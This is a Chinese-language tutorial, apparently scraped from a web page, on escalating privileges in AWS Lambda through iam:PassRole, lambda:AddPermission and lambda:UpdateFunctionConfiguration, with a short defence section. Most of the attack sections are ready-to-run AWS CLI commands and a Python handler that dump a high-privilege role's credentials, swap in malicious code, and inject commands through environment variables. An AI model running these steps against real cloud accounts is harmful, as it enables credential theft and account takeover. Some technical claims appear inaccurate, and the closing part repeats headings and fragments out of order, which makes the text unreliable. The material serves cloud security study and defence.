AWS Lambda 权限管理与提权技巧全面解析<\/h1>

1. IAM PassRole 权限与 Lambda 提权<\/h2>

1.1 iam:PassRole 权限详解<\/h3>

iam:PassRole<\/code> 是 AWS IAM 权限中的关键权限，它允许 IAM 用户或角色将特定 IAM 角色传递给 AWS 服务，使这些服务能够使用该角色执行任务或访问资源。<\/p>

关键特性：<\/p>


允许用户将权限附加到自己创建的 AWS 资源上<\/li>
角色通常包含相关权限（如访问 S3、CloudWatch 等）<\/li>
用户仅能传递角色，不会直接获得该角色的权限<\/li>
<\/ul>
1.2 结合 lambda:CreateFunction 的提权原理<\/h3>
当用户同时拥有 iam:PassRole<\/code> 和 lambda:CreateFunction<\/code> 权限时，可能实现权限提升：<\/p>

创建 Lambda 函数时，可以为其指定高权限角色<\/li>
通过控制 Lambda 函数（如获取环境变量）获取高权限凭据<\/li>
关键点：CreateFunction<\/code> 默认包含执行权限<\/li>
<\/ol>
1.3 实际利用步骤<\/h3>


准备恶意代码<\/strong>：<\/p>

创建 Python 脚本（如 rev.py<\/code>）读取环境变量<\/li>
<\/ul>
import<\/span> os
<\/span><\/span>def<\/span> lambda_handler<\/span>(event, context):
<\/span><\/span>    return<\/span> dict(os.<\/span>environ)
<\/span><\/span><\/code><\/pre><\/li>

打包代码<\/strong>：<\/p>
zip rev.zip rev.py
<\/span><\/span><\/code><\/pre><\/li>

创建 Lambda 函数<\/strong>：<\/p>
aws lambda create-function \
<\/span><\/span><\/span><\/span>  --function-name malicious_function \
<\/span><\/span><\/span><\/span>  --runtime python3.8 \
<\/span><\/span><\/span><\/span>  --handler rev.lambda_handler \
<\/span><\/span><\/span><\/span>  --role arn:aws:iam::123456789012:role\/TestRole \
<\/span><\/span><\/span><\/span>  --zip-file fileb:\/\/rev.zip
<\/span><\/span><\/code><\/pre><\/li>

执行函数获取敏感信息<\/strong>：<\/p>
aws lambda invoke --function-name malicious_function output.txt
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. lambda:AddPermission 权限利用<\/h2>
2.1 AddPermission 权限说明<\/h3>
lambda:AddPermission<\/code> 允许向 Lambda 函数添加权限，控制哪些实体可以调用该函数。<\/p>
2.2 提权原理<\/h3>

用户可以给 IAM 角色赋予 Lambda 函数的任意权限<\/li>
可以修改 Lambda 函数代码为恶意代码<\/li>
通过授予调用权限实现权限提升<\/li>
<\/ol>
2.3 利用步骤<\/h3>


查看现有函数<\/strong>：<\/p>
aws lambda list-functions
<\/span><\/span><\/code><\/pre><\/li>

添加权限<\/strong>（示例给当前角色所有权限）：<\/p>
aws lambda add-permission \
<\/span><\/span><\/span><\/span>  --function-name target_function \
<\/span><\/span><\/span><\/span>  --action lambda:* \
<\/span><\/span><\/span><\/span>  --principal arn:aws:iam::123456789012:role\/CurrentRole \
<\/span><\/span><\/span><\/span>  --statement-id malicious_statement
<\/span><\/span><\/code><\/pre><\/li>

更新函数代码<\/strong>：<\/p>
aws lambda update-function-code \
<\/span><\/span><\/span><\/span>  --function-name target_function \
<\/span><\/span><\/span><\/span>  --zip-file fileb:\/\/malicious.zip
<\/span><\/span><\/code><\/pre><\/li>

触发函数执行<\/strong>：<\/p>
aws lambda invoke --function-name target_function output.txt
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. lambda:UpdateFunctionConfiguration 权限利用<\/h2>
3.1 权限说明<\/h3>
lambda:UpdateFunctionConfiguration<\/code> 允许修改 Lambda 函数配置，包括：<\/p>

环境变量：可设置\/修改\/删除<\/li>
执行角色：可更换为更高权限角色<\/li>
<\/ul>
3.2 环境变量注入攻击<\/h3>
通过滥用环境变量实现命令执行：<\/p>


Python 环境变量滥用<\/strong>：<\/p>

利用 PYTHONWARNING<\/code> 和 BROWSER<\/code> 环境变量执行命令<\/li>
<\/ul>
<\/li>

配置恶意环境变量<\/strong>：<\/p>
aws lambda update-function-configuration \
<\/span><\/span><\/span><\/span>  --function-name target_function \
<\/span><\/span><\/span><\/span>  --environment "Variables={PYTHONWARNING='import os; os.system(\"malicious_command\")'}"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

触发函数执行<\/strong>：<\/p>
aws lambda invoke --function-name target_function output.txt
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 防御措施<\/h2>


最小权限原则<\/strong>：<\/p>

严格限制 iam:PassRole<\/code> 权限<\/li>
仅允许传递必要的最小权限角色<\/li>
<\/ul>
<\/li>

Lambda 函数权限控制<\/strong>：<\/p>

监控 Lambda 函数的角色分配<\/li>
限制 UpdateFunctionConfiguration<\/code> 权限<\/li>
<\/ul>
<\/li>

环境变量管理<\/strong>：<\/p>

避免在环境变量中存储敏感信息<\/li>
监控环境变量变更<\/li>
<\/ul>
<\/li>

审计与监控<\/strong>：<\/p>

记录所有 Lambda 相关 API 调用<\/li>
设置异常行为告警<\/li>
<\/ul>
<\/li>
<\/ol>
5. 总结<\/h2>
AWS Lambda 提权主要利用以下权限组合：<\/p>

iam:PassRole<\/code> + lambda:CreateFunction<\/code>：创建高权限函数<\/li>
lambda:AddPermission<\/code>：授予恶意调用权限<\/li>
lambda:UpdateFunctionConfiguration<\/code>：通过环境变量或角色更换提权<\/li>
<\/ol>
理解这些权限的交互方式是防御和攻击的关键，安全团队应特别关注这些权限的分配和使用情况。<\/p>

AWS Lambda 权限管理与提权技巧全面解析<\/h1>

1. IAM PassRole 权限与 Lambda 提权<\/h2>

2. lambda:AddPermission 权限利用<\/h2>

2.1 AddPermission 权限说明<\/h3> lambda:AddPermission<\/code> 允许向 Lambda 函数添加权限，控制哪些实体可以调用该函数。<\/p>

3. lambda:UpdateFunctionConfiguration 权限利用<\/h2>

2.1 AddPermission 权限说明<\/h3>
`lambda:AddPermission<\/code> 允许向 Lambda 函数添加权限，控制哪些实体可以调用该函数。<\/p>`